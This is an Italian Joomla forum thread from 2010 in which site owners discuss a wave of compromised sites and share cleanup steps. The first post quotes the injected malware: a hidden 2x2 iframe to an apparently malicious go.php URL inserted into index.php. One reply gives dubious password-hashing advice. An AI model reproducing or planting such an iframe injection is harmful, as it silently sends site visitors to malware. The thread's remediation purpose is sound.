Joomla.it Forum

Non solo Joomla... => Sicurezza => : joored 02 Oct 2010, 00:21:14

: Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: joored 02 Oct 2010, 00:21:14
Vari miei siti (6) in joomla 1518 e 1520 questa settimana sono stati hakerati.

Scomparsi i siti viene visualizzato a schermo il seguente messaggio:

:
Parse error: syntax error, unexpected '<' in /web/htdocs/www._______.it/home/index.php

on line 88

Impossibile entrare anche lato amministrativo.

In sostanza questi idiot_ hanno corrotto tutti i file index.php di ciascun sito (ivi

inclusi i file delle copie di backup, template, ecc..) inserendo un reindirizzamento.

Reindirizzamento fallito per fortuna perché il codice è stato inserito in modo errato.
Ma il danno comunque l'hanno fatto!

Per risolvere ho dovuto aprire ogni file index.php e alla linea 88

sostituire

:
echo JResponse::toString($mainframe->getCfg('gzip'));<html><body><iframe

src='http://sytratesthj.co.cc/1/go.php?sid=13' width='2' height='2'

frameborder='0'></iframe></body></html>

con

:
echo JResponse::toString($mainframe->getCfg('gzip'));
Quelli 1518 li sto aggiornando alla 1520 ma mi chiedo:
1) come essere certo di aver ripulito tutti i file corrotti?
2) come fare per impedire che ciò si verifichi ancora?

Aggiornare alla 1520 non basta.
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: seflex 02 Oct 2010, 14:50:05
Scarica tutte le cartelle del sito sul pc usando il programma total comander cerca ad esempio http://
e vedi tutte url che trova ed eventualmente elimina.
Ti consiglio di cambiare i tuoi dati di acceso ftp, mysql e cambiare il nome utente e password administrator.
E puoi magari installa un componente per la protezione e stai attento ai permessi di file configuration.php
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: alexred 02 Oct 2010, 15:00:07
Ciao joored,
i siti attaccati sono tutti sul solito hosting?
Ci sono estensioni esterne in comune a questi siti?
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: jeckodevelopment 02 Oct 2010, 15:03:50
spero che non dipenda da problemi di permessi settati con leggerezza.
Io penso sia dovuto a qualche estensione non aggiornata...
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: joored 02 Oct 2010, 16:05:00
Alexred ... si sono ospitati dallo stesso hosting (ar_ _ a), sto provvedendo a segnalare loro il fatto.
Quanto ai componenti esterni installati, solo due hanno in comune sobi2.

Avevo iniziato a ripulire un sito e quando ho finito dopo meno di un'ora ho subito un altro attacco.

Come posso avere certezza di aver cancellato tutto?

Come faccio ad avere velocemente un elenco di tutti i componenti, plugin e moduli installati in ciascun sito ?
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: maicolstaip 02 Oct 2010, 16:11:42
Ciao joored,
se per esempio ti hanno sniffato le credenziali ftp, puoi fare tutto quel che vuoi con joomla che rientrano e ti cambiano di nuovo i files.
Sposto nella sezione sicurezza.
Ciao!
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: ariess 02 Oct 2010, 16:12:19

Avevo iniziato a ripulire un sito e quando ho finito dopo meno di un'ora ho subito un altro attacco.


scarica i siti e controllali in locale altrimenti ti fanno diventare matto!
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: joored 02 Oct 2010, 16:19:36
Li scarico in locale ( >:( d'altronde sono solo 6 siti belli pesanti) e li controllo. Ci vorranno due tre gioni per farlo, ma non ho alternative,
Come giustamente dice maicolstaip cambio le credenziali ftp;

Cambio user e password di accesso.

Ma come posso avere un elenco veloce di tutti i componenti, plugin e moduli installati? Per poter controllare ad auno ad uno gli aggiornamenti?
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: spider80 02 Oct 2010, 16:21:42
spero che non dipenda da problemi di permessi settati con leggerezza.
Io penso sia dovuto a qualche estensione non aggiornata...

Ho anch'io lo stesso problema.
- Poichè uso dei moduli fatti da me, può dipendere da questi moduli?

- come posso controllare che i permessi siano impostati correttamente?
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: spider80 02 Oct 2010, 16:24:08
Ma come posso avere un elenco veloce di tutti i componenti, plugin e moduli installati? Per poter controllare ad auno ad uno gli aggiornamenti?

da Estensioni-> Installa/Disinstalla -> Moduli (Componenti, Plugin etc..)
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: joored 02 Oct 2010, 16:25:24
Con File Zilla vedi i permessi delle cartelle e dei file.
Le cartelle vanno tenute a 0775 e i file a 0664 .... o mi sbaglio?
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: joored 02 Oct 2010, 16:28:00
Si lo so Spider ... da Estensioni-> Installa/Disinstalla -> Moduli (Componenti, Plugin etc..), pensavo ci fosse un metodo per avere un elenco complessivo
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: joored 02 Oct 2010, 16:42:32
Grazie Seflex,
Scarica tutte le cartelle del sito sul pc usando il programma total comander cerca ad esempio http://
e vedi tutte url che trova ed eventualmente elimina.
Ti consiglio di cambiare i tuoi dati di acceso ftp, mysql e cambiare il nome utente e password administrator.
E puoi magari installa un componente per la protezione e stai attento ai permessi di file configuration.php

Il file configuration.php ha i permessi settati 0664, va bene così?
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: jeckodevelopment 02 Oct 2010, 17:00:45
il configuration.php dovrebbe avere 644
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: mau_develop 02 Oct 2010, 17:15:36
.. si ma finchè non trovate da che buco passa... lui passa , poimagari li cambia i permessi... a parte che è owner e quindi anche con 644 riesce tranquillamente a leggere tutto.

ho sentito di moduli auto prodotti...
sono entrato in un sito e dal sorgente ho visto un bel gantry...
non ho sentito ancora di scansioni antivirus approfondite sui pc (da avvio provvisorio con rete staccata)

joomla 1.5.20 NON ha problemi, è per forza qualcosa che o vi portate dietro o riguarda vulnerabilità di extensions installate.

per le password... un consiglio:

se la tua password è: sonopippoesonobello, fatti un file pw.php (locale) dove metti un bel <?php md5('sonopippoesonobello'); ?> , dopodichè lo chiami e vedrai una bella stringa md5 della tua password ... usa quell'hash che anche in caso di sqlinj rende impossibile il reverse poichè subisce una seconda criptazione da parte di joomla.
Usate lo stesso sistema ( se consentito) anche per le altre password che, anche se non vengono criptate, sono comunque improbabili da trovare con un brute force.
L'unico 'fastidio' è che quella password non ve la ricorderete di certo a memoria, andrà quindi salvata da qualche parte per essere poi copiata e incollata. Ma tutto questo è oltre i problemi di vulnerabilità.

Provate anche ad installare il tool di mmleoni che potrebbe aiutare a contenere il problema, che va comunque risolto.

M.
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: makjla 04 Oct 2010, 10:41:26
Ciao, chiedo scusa se mi aggiungo a questo topic ma anche io ho avuto lo stesso problema. 5 siti web tutti hackerati. Il fatto è che sono anche su hosting diversi. Ora sto cercando di risolvere con le tue indicazioni. Inizialmente ho provato a sostituire gli index.php ma non funziona il pannello dell'amministrazione.

Rettifico. Joored ho provato a seguire le tue indicazioni ma la parte admin non funziona cmq... Qualche consiglio?

EDIT: risolto sostituendo i vari index.php anche nella cartella administrator
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: @kshym 04 Oct 2010, 18:59:43
Ciao ragazzi
uno dei miei siti su ar_ _ _ _a è stato attacato, un paio di giorni fa.
ho sostituito index.php e ripartito, oggi è succeso di nuovo.
c'è da qualche parte un certo tipo di manuale come trovare i buchi dei haker.
Prima di tutto come trovare quello che hanno fatto i haker e come coreggerlo.
Secondo come devo proteggermi in futuro

la versione che ho 1.5.15, un amico mi ha suggerito di aggironare al 1.5.20, che dovrebbe risolvere la problemma, ma non penso che aiutera per lungo periodo

Grazie a Tutti
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: ariess 04 Oct 2010, 19:16:14
ciao makjla e @kshym

non date per scontato che tutto sia tornato a posto per il semplice fatto che il sito abbia ripreso a funzionare.
sostituire gli index non basta, aggionare joomla o i componenti dopo aver ricevuto l'attacco non serve a niente...

bisogna trovare la falla prima di sentirsi al sicuro. nella sezione sicurezza trovate molti post dove si spiega come risolvere il problema, certo ci vuole moooolta pazienza e un pò di esperienza....
in alternativa rifare l'installazione e mantenerla costantemente aggiornata
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: makjla 04 Oct 2010, 19:31:43
@ricdata so bene che ripristinare gli index.php non è una soluzione, infatti uno dei miei siti è stato hackerato due volte in due giorni, ma io ho la versione di joomla aggiornata alla 1.5.20 e pochissime estensioni installate (l'installazione peraltro è stata fatta poco tempo fa) Non credo che rifacendo l'installazione risolverei il problema. Ho provato ad installare un plugin contro gli attacchi hacker che ho visto su questo forum e ora mi documento un pò per vedere cos'altro fare. Onestamente è la prima volta che mi capita una cosa del genere e non so esattamente come muovermi. Grazie comunque per il supporto
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: ariess 04 Oct 2010, 19:43:41
avevi la .20 fin dall'inizio o hai aggionato dopo l'attacco?

non credo che rifacendo l'installazione risolverei il problema.
se rifai l'installazione da zero il problema lo risolvi a meno che il problema non sia del server mal configurato o di qualche "vicino" (se sei sul condiviso)

hai provato a chiedere informazioni all'host?
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: mau_develop 04 Oct 2010, 19:48:12
infatti non bisognerebbe reinstallare, se sei / siete arrivati a qs punto è perchè:

- Joomla o le extensions non aggiornate o comunque cose installate insicure.
- backup frequenti non fatti
- inutili backup incrementali automatici lasciati sul server
- scansioni antivirus approfondite (avvio provvisorio con rete staccata) probabilmente tralasciate o vi fidate del fatto di avere un av installato..... un buon antivirus individua e blocca il 20% dei virus in circolazione....

ovvio che quando poi capita sono casini, non è certo una paternale, qs infezione me la sono presa anch'io e non è stato per nulla facile riuscire ad uscirne e ho preferito reinstallare anche se mi è costato due buoni gg di lavoro.

M.
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: makjla 04 Oct 2010, 19:50:28
Avevo la .20 già da prima dell'attacco. Uno è il mio sito web personale e quindi è costantemente aggiornato. Non ho aggiornato in seguito all'attacco. Cmq si , devo chiedere anche informazioni all'host. Vi farò sapere.
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: mau_develop 04 Oct 2010, 19:56:47
...su agape hai un problema :)

M.
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: makjla 04 Oct 2010, 21:13:13
quale problema?
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: mau_develop 04 Oct 2010, 21:29:15

Parse error: syntax error, unexpected '<' in /home/agapeweb/public_html/index.php on line 88

se è tuo... ma credo di si...
quando hai detto "..Uno è il mio sito web personale ..." mi è scattata la curiosità e sono andato in giro a curiosare :) ... offesa? ...fatto nulla di male,... poi magari nn è nemmeno tuo  ;D ;D ;D

M.
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: makjla 04 Oct 2010, 21:33:25
E' mio, ma è un sito web di prova che uso per fare i test. Anche lì c'è la versione 1.5.20.... quindi cosa dovrei fare per metterli in sicurezza? qualcuno ha dei consigli pratici?
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: taolo 04 Oct 2010, 21:35:21
quando hai detto "..Uno è il mio sito web personale ..." mi è scattata la curiosità e sono andato in giro a curiosare :) ... offesa? ...fatto nulla di male,... poi magari nn è nemmeno tuo  ;D ;D ;D

M.

 ::) Che dolce questo mod....  ;D
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: mau_develop 04 Oct 2010, 21:47:59
emh emh ... grazie per il mod... diciamo mascotte  ;D

Che dolce questo mod.... 
----------------------------------
magari... a volte penso sia una malattia... quando mi parte l'embolo... compulsivo-maniacal-curioso... ero uno di quei maledetti bimbi che nessun genitore si agura, ogni cosa mi durava il tempo di trovare un cacciavite :):)

M.

EDITO QUI

qualcuno ha dei consigli pratici?
----------------------------------------------

Dipende da un po' di considerazioni, ove semplice reinstallare dopo aver pulito tutto il remoto e portato in locale il sito bucato, senza aprirlo su un server (xamp).
poi piano piano spulci il template e lo rimetti. e così per i contenuti, solo quelli che sei convinta siano tuoi.

Se il sito è molto pieno bisogna individuare dove può essere il problema, dove possono essere state inserite delle shell, solitamente in cartelle contenenti file uppabili o nella cache o nel tmp.

comunque sia qs tipi di attacchi hanno correlazione con social network twitter facebook etc e molto spesso sono trojan che affliggono il browser e/o filezilla

M.

ps io sono abbastanza convinto che siete voi stessi complici involontari del problema per quello fatto un sito son fatti tutti... anche su diversi hosting... e linux non è proprio "esente" da questa vuln.
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: joored 05 Oct 2010, 14:08:33
Makjla,
bonificare i file index.php e index.html non basta ...
Il problema, a quanto pare, dipende da un trojan che si è installato sul computer ... per cui occorre:

1) PRIORITARIAMENTE, prima di ogni altra operazione, fare una scansione accurata (in modalità provvisoria) del proprio computer (io ne ho trovato uno che aveva attinenza con l'attacco);

2) cambiare user+pass dell'accesso ivi inclusi quelli ftp e del database

3) cambiare user+pass del super amministratore

4) scaricare sul proprio computer, in un'apposita cartella, tutto il sito attaccato

5) Passare la cartella con l'antivirus accuratamente

5) munirsi di un programma di Search & Replace (ce ne sono gratuiti)

6) cercare con il programma di Search & Replace le stringhe di codice maligno e cancellarle o sostituirle con il codice opportuno (io ho cercato con queste parole chiave: sytratesthj e 12rret, ma potrebbero essere altre, dipende dall'attacco)

7) cancellare via ftp sul server tutte le cartelle e files

- trasferire via ftp sul server le cartelle ed i files bonificati

9) aggiornare joomla all'ultima versione 1520 (se trattasi di versione precedente) e aggiornare tutti i componenti,plugin e moduli

10) incrociare le dita!
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: jeckodevelopment 05 Oct 2010, 15:37:01
11) installare il plugin di mmleoni e attivarlo... per una maggiore (relativamente) tranquillità.
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: filipposs 05 Oct 2010, 16:20:37
Scusate, dove si trova il plugin di mmleoni?

Ciao
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: makjla 05 Oct 2010, 16:26:35
@filipposs ecco il thread in cui c'è il link per scaricare il plugin http://forum.joomla.it/index.php/topic,105058.msg464403.html#msg464403

grazie per le dritte. Ripetere questa operazione su 6 siti web sarà davvero dura ma ci proverò. Spero che serva a qualcosa almeno. Grazie
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: rossosat 05 Oct 2010, 22:01:37
Non so se è una coincidenza, ma tutti i miei siti con errore
" Parse error: syntax error, unexpected '<' in /web/htdocs/ " sono tutti hostati su Aru*a
E io li ho tutti aggiornati alla 1.5.20, siamo tutti nella stessa barca.. e aggiornare non è servito in quanto hanno reinserito il codice maligno nella index sia backend che frontend  dopo sole 24 ore.
Speriamo bene..
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: ariess 05 Oct 2010, 22:32:04
e aggiornare non è servito in quanto hanno reinserito il codice maligno nella index sia backend che frontend  dopo sole 24 ore.

ti sei letto tutto il topic?
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: rossosat 06 Oct 2010, 09:25:19
ti sei letto tutto il topic?

No, non l'ho fatto e chiedo scusa per questo, ero stanco morto ieri sera..ma ora lo rileggo con attenzione.
: Re:Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520
: alexred 04 Dec 2010, 12:23:32
Ciao ragazzi
uno dei miei siti su ******** è stato attacato, un paio di giorni fa.
Se sei stato così intelligente, arguto e furbo da evitare la censura del forum spero tu possa essere tanto intelligente da sapere che su questo forum non sono ammessi riferimenti a prodotti e servizi commerciali all'interno dei post. Non deluderci oltre, modifica quanto hai scritto ed evita in futuro di prendere in giro gli amministratori di questo forum (che sono dei volontari) e tutti gli utilizzatori ed infine te stesso. Grazie per l'aiuto